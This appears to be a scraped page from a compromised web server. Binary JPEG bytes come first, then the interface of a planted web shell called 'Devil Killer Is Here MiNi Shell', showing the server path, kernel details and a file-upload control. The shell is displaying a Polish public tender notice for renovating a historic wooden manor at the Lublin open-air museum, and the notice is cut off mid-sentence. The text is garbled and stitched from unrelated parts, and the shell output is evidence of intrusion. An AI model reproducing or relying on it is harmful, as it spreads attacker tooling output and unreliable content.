JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240829/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240829/0047712601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Zaprojektowanie i wykonanie robót budowlanych pn.: „Renowacja zabytkowego XIX-wiecznego drewnianego dworu rezydencjonalnego z Huty Dzierążyńskiej w sektorze dworskim Muzeum Wsi Lubelskiej w Lublinie” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum Wsi Lubelskiej w Lublinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000277173</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Warszawska 96</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-824</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">skansen@skansen.lublin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.skansen.lublin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zaprojektowanie i wykonanie robót budowlanych pn.: „Renowacja zabytkowego XIX-wiecznego drewnianego dworu rezydencjonalnego z Huty Dzierążyńskiej w sektorze dworskim Muzeum Wsi Lubelskiej w Lublinie” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5e4554d2-3b30-4c32-82f8-50f0c1b2c341</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00477126</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00226544/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Renowacja zabytkowego XIX-wiecznego drewnianego dworu rezydencjalnego z Huty Dzierążyńskiej w sektorze dworskim Muzeum Wsi Lubelskiej w Lublinie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://skansen-lublin.ezamawiajacy.pl/pn/skansen-lublin/demand/172178/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert oraz wszelkich oświadczeń, może się odbywać wyłącznie przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz.U. z 2020 r. poz. 344), tj. przy użyciu Platformy elektronicznej (Platforma zakupowa on-line Marketplanet), dostępna pod adresem https://skansen-lublin.ezamawiajacy.pl - dalej zwana „Platformą”. W przypadku trudności technicznych związanych z korzystaniem z Platformy, Zamawiający dopuszcza możliwość przekazywania<br/>informacji drogą elektroniczną: administracja@skansen.lublin.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie https://skansen-lublin.ezamawiajacy.pl lub https://oneplace.marketplanet.pl<br/>2) Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są za pośrednictwem Platformy. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki „Korespondencja”.<br/>3) W przypadku przekazywania w postępowaniu dokumentu elektronicznego w formacie poddającym dane kompresji, opatrzenie pliku zawierającego skompresowane dokumenty kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, jest równoznaczne z opatrzeniem wszystkich dokumentów zawartych w tym pliku odpowiednio kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>4) Zamawiający informuje, iż w przypadku przesłania przez Wykonawcę dokumentów elektronicznych skompresowanych (w tym oferta), dopuszczone są jedynie formaty danych wskazanych w Rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w<br/>postaci elektronicznej ora minimalnych wymagań dla systemów teleinformatycznych (Dz.U. z 2017 r. poz. 2247). Powyższe oznacza, iż Zamawiający nie dopuszcza przesyłania dokumentów elektronicznych (w tym oferty) skompresowanych np. formatem .rar<br/>5) Oferta powinna być sporządzona/sporządzony w języku polskim, z zachowaniem postaci elektronicznej (przykładowe formaty danych dla sporządzenia oferty: .doc, .docx, .rtf, .xps, .odt.. Przy czym zaleca się sporządzenie oferty w formacie danych: .pdf) i opatrzona kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym (Wśród formatów powszechnych, a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną<br/>uznane za złożone nieskutecznie)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DA.232-3/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1.	Przedmiotem zamówienia jest: Renowacja zabytkowego XIX-wiecznego drewnianego dworu rezydencjonalnego z Huty Dzierążyńskiej w sektorze dworskim Muzeum Wsi Lubelskiej w Lublinie - w formule „zaprojektuj i wybuduj”.<br/>4.2.	Obiekt objęty przedmiotem zamówienia znajduje się na terenie Muzeum Wsi Lubelskiej w Lublinie, al. Warszawska 96, położonego w Sektorze Dworskim MWL.<br/>4.3.	Muzeum jest wpisane do rejestru zabytków nieruchomych Województwa Lubelskiego pod nr A/813 jako &#34;obszar zespołu krajobrazowo-architektonicznego skansenu Muzeum Wsi Lubelskiej przy Alei Warszawskiej w Lublinie&#34; na podstawie decyzji KL.IV.5349/1/81 z dnia 31 marca 1981 r. wydanej przez Wojewódzkiego Konserwatora Zabytków w Lublinie.<br/>4.4.	Dwór z Huty Dzierążyńskiej wpisany jest do Księgi Wpływów Muzealiów pod nr MWL/3862 - wpis z 1977 r.<br/>4.5.	Zakres przedmiotu zamówienia obejmuje, w szczególności:<br/>4.5.1.	Opracowanie Dokumentacji Technicznej (w tym uzyskanie pozwolenia na prowadzenie robót budowlanych), składającej się w szczególności z:<br/>a)	projekt budowlany (w tym: projekt zagospodarowania terenu, projekt architektoniczno – budowlany, projekt techniczny),<br/>b)	projekty wykonawcze,<br/>c)	przedmiary robót,<br/>d)	specyfikacje techniczne wykonania i odbioru robót budowlanych,<br/>e)	kosztorys inwestorski,<br/>f)	inne opracowania i dokumenty niezbędne do należytego wykonania przedmiotowego zamówienia.<br/>4.5.2.	Wykonanie robót budowanych. Opis inwestycji: W historycznym obiekcie z Dzierążni, wpisanym do rejestru inwentarza MWL pod nr 3862, dawnej siedzibie zarządcy dóbr Dzierążyńskich znajduje się obecnie Dział Edukacji i Promocji stanowiąc jednocześnie centrum muzealnych działań edukacyjnych i promocyjnych związanych z dziedzictwem kulturowym Lubelszczyzny. Dwór pilnie wymaga przeprowadzenia szeregu niezbędnych działań, które zabezpieczą budynek i ochronią go przed zniszczeniem. Działania te nie mogły zostać podjęte ze względu na trudną sytuację Muzeum w trakcie pandemii. Budynek drewniany szerokofrontowy, o konstrukcji węglowej, z gankiem kolumnowym, tynkowany od wewnątrz i zewnątrz, z dachem krytym gontem, charakterystyczny dla siedzib średniozamożnej szlachty w XVIII i XIX w. o kubaturze 996 m3, powierzchni zabudowy 166 m2, użytkowej 252 m2. Obiekt wymaga usunięcia zniszczonych elementów na zewnątrz i wewnątrz oraz zastąpienie ich nowymi – w tym konstrukcji dachu i jego przykrycia drewnianym gontem, stropów, otworów okiennych i drzwiowych, wymiany drewnianych podłóg, ganku oraz schodów zewnętrznych i zewnętrznych do toalet. Wokół dworu należy wykonać utwardzenie i odwodnienie terenu. Ściany i stropy wymagają ocieplenia, tynki wewnętrzne i zewnętrzne wymiany. Należy również wymienić starą instalację grzewczą i elektryczną oraz sanitarną, zlikwidować boazerię oraz zabezpieczyć obiekt w nowe instalacje przeciwpożarowe, antywłamaniowe i system monitorowania. Sieni dworu przywrócona zostanie funkcja wystawiennicza. Pomieszczenia biurowe i edukacyjne zostaną wyposażone w urządzenia, wyposażenie niezbędne do realizacji zadań promocyjnych, zajęć edukacyjnych i warsztatowych dla dzieci szkolnych, rodzin i seniorów. Zarówno przestrzeń na zewnątrz jak i pomieszczenia znajdujące się wewnątrz należy dostosować do potrzeb osób z niepełnosprawnościami. Przestrzeń wraz z klombem wokół reprezentacyjnie usytuowanego dwory stanowiąc miejsce zbiórek i formowania się grup i wycieczek wyruszających na muzealny spacer pieszo lub konnymi powozami, zostanie dostosowana pod tym kątem i wyposażona w niezbędną małą architekturę. Dostosowane zostaną do współczesnych standardów toalety, pomieszczenia na poziomie „-1”. Wyremontowane sanitariaty, pomieszczenia będą zapewniać możliwość korzystania z nich przez wszystkie grupy zwiedzających. W tym celu stworzony zostanie specjalny zjazd – pochylnia – pozwalający na korzystanie z tej strefy również osobom na wózkach inwalidzkich i z małymi dziećmi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71420000-8 - Architektoniczne usługi zagospodarowania terenu</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	W zakresie doświadczenia Wykonawca winien wykazać, że wykonał należycie nie wcześniej niż w okresie ostatnich 10 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej: <br/>a)	jedną robotę budowlaną, polegającą na budowie, przebudowie lub remoncie budynku - zabytku nieruchomego, objętego ochroną konserwatorską zabytków wpisanego do rejestru bądź znajdującego się na terenie objętym ochroną konserwatorską wpisanego do rejestru inwentarza muzeum będącego instytucją kultury, o wartości nie mniejszej niż 2 000 000,00 zł brutto, z zastrzeżeniem:<br/>i.	zamówienie, na które powoła się Wykonawca musi dotyczyć budowy, przebudowy lub remontu budynku, w którym pomieszczenia są przeznaczone na pobyt stały ludzi, np. budynek mieszkalny, zamieszkania zbiorowego lub użyteczności publicznej (z wyłączeniem budynków gospodarczych, budynków rekreacji indywidualnej, budynków inwentarskich, składowych i przemysłowych, hal produkcyjnych, magazynowych, pasaży handlowych czy hangarów oraz innych budynków, w których pomieszczenia nie są przeznaczone na pobyt stały ludzi),<br/>ii.	użyte powyżej określenia „budynek mieszkalny, budynek zamieszkania zbiorowego, budynek użyteczności publicznej, budynek gospodarczy, budynek rekreacji indywidualnej, pomieszczenia przeznaczone na pobyt stały ludzi”, należy interpretować w rozumieniu nadanym rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. 2022 poz. 1225 ze zm.),<br/>iii.	użyte powyżej określenia „budowa, przebudowa, remont”, należy interpretować w rozumieniu nadanym ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. 2024 poz. 725 ze zm.),<br/>iv.	użyte powyżej określenie „zabytek nieruchomy” - należy interpretować zgodnie z definicją zawartą w art. 3 pkt 1 i 2 ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (Dz.U. 2022 poz. 840 ze zm.),<br/>v.	w przypadku, gdy Wykonawca wykonywał w ramach jednej umowy większy zakres prac, dla potrzeb niniejszego zamówienia powinien on wyodrębnić i podać wartość robót budowlanych polegających tylko na budowie, przebudowie lub remoncie budynków, o których mowa w ppkt 1a),<br/>vi.	wartości podane w ofercie (oraz załącznikach do oferty) w walutach innych niż PLN będą przeliczane wg średniego kursu NBP na dzień podpisania protokołu odbioru robót budowlanych bądź innego równoważnego dokumentu,<br/>vii.	Wykonawca zobowiązany jest wykazać 1 robotę budowlaną realizowaną w ramach jednej odrębnej umowy; Zamawiający nie dopuszcza łączenia kilku robót budowlanych i sumowania ich wartości w celu wykazania spełniania przedmiotowego warunku udziału w postępowaniu,<br/>viii.	Wykonawca musi przedstawić dowody czy roboty zostały wykonane w sposób należyty,<br/>b)	jedną dokumentację projektową, polegającą na budowie, przebudowie lub remoncie budynku - zabytku nieruchomego, objętego ochroną konserwatorską zabytków, wpisanego do rejestru bądź znajdującego się na terenie objętym ochroną konserwatorską, wpisanego do rejestru inwentarza muzeum będącego instytucją kultury, o wartości nie mniejszej niż 200 000,00 zł brutto, z zastrzeżeniem odpowiednio do usługi jw. oraz:<br/>i.	Zamawiający dopuszcza spełnianie ww. warunku, tj. wykonanie roboty budowlanej i dokumentacji projektowej, w ramach jednej umowy (np. zamówienie realizowane w trybie „zaprojektuj i wybuduj”), przy zachowaniu minimalnych wartości umowy dla każdego z rodzaju zamówień, o których mowa powyżej,<br/>ii.	użyte powyżej określenie „dokumentacja projektowa” – należy przez to rozumieć opracowanie, składające się co najmniej z projektu budowlanego, tj. dokumentów i projektów, podlegających prawnemu zatwierdzeniu, przedstawiające plany inwestycji budowlanej, w formie i zakresie określonym przepisami prawa, stanowiące część dokumentacji budowy, którego zawartość określa rozporządzenie Ministra Rozwoju z dnia 11 września 2020 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. 2022 poz. 1679 ze zm.);<br/>2)	W zakresie kadry o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować w okresie wykonywania zamówienia i skierują do jego realizacji zamówienia: <br/>a)	co najmniej jedną osobę (która będzie pełnić funkcję Kierownika prac konserwatorskich) posiadającą uprawnienia konserwatorskie w zakresie konserwacji zabytków, zgodnie z art. 37a ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (Dz.U. 2022 poz. 840 ze zm.),<br/>b)	co najmniej jedną osobę (która będzie pełnić funkcję Głównego Projektanta) posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności architektonicznej,<br/>c)	co najmniej jedną osobę (która będzie pełnić funkcję Kierownika Budowy) posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej, oraz kwalifikacje do kierowania pracami przy zabytkach nieruchomych, zgodnie z art. 37c ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (Dz.U. 2022 poz. 840 ze zm.),<br/>d)	co najmniej jedną osobę posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności architektonicznej,<br/>e)	co najmniej jedną osobę posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności konstrukcyjno-budowlanej,<br/>f)	co najmniej po jednej osobie posiadających odpowiednio uprawnienia budowlane do projektowania i kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,<br/>g)	co najmniej po jednej osobie posiadających odpowiednio uprawnienia budowlane do projektowania i kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji urządzeń elektrycznych i elektroenergetycznych.<br/><br/>DODATKOWE INFORMACJE DOTYCZĄCE KADRY:<br/><br/>1)	Osoby skierowane do realizacji zamówienia muszą legitymować się posiadaniem uprawnień do kierowania robotami budowlanymi w specjalnościach wymienionych powyżej oraz muszą przynależeć do odpowiednich samorządów zawodowych (za wyjątkiem konserwatora zabytków);<br/>2)	Zamawiający dopuszcza możliwość łączenia kliku funkcji oraz specjalności przez jedną osobę, pod warunkiem posiadania przez nią wymaganych w SWZ uprawień (np. ta sama osoba posiadająca uprawnienia do projektowania i kierowania robotami budowlanymi w ramach tej samej bądź różnych specjalności);<br/>3)	Zamawiający dopuszcza możliwość separowania funkcji projektanta i kierownika budowy/robót budowlanych zarówno w ramach różnych specjalności, jak i w ramach tej samej specjalności (np. inna osoba z uprawnieniami do projektowania, inna osoba z uprawnieniami do kierowania robotami budowanymi) jeżeli dana osoba nie dysponuje uprawnieniami jednocześnie do projektowania i kierowania robotami budowlanymi;<br/>4)	Dopuszcza się uprawnienia równoważne – dla osób, które posiadają uprawnienia uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994r. Prawo budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie i zachowały uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie;<br/>5)	Uprawnienia osób, o których mowa powyżej powinny być zgodne z aktualnie obowiązującymi przepisami prawa, w tym z ustawą z dnia 7 lipca 1994r. Prawo budowlane (Dz.U. 2024 poz. 725 ze zm.) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r. poz. 831 ze zm.) lub ważne odpowiadające im kwalifikacje, nadane na podstawie wcześniej obowiązujących przepisów w zakresie objętym niniejszym zamówieniem. Uprawnienia budowlane nadane na podstawie wcześniej obowiązujących przepisów prawa zostaną uznane przez Zamawiającego za ograniczone, jeżeli będą opiewać na: obiekty budowlane, budowle i instalacje o powszechnie znanych rozwiązaniach konstrukcyjnych i schematach technicznych bądź 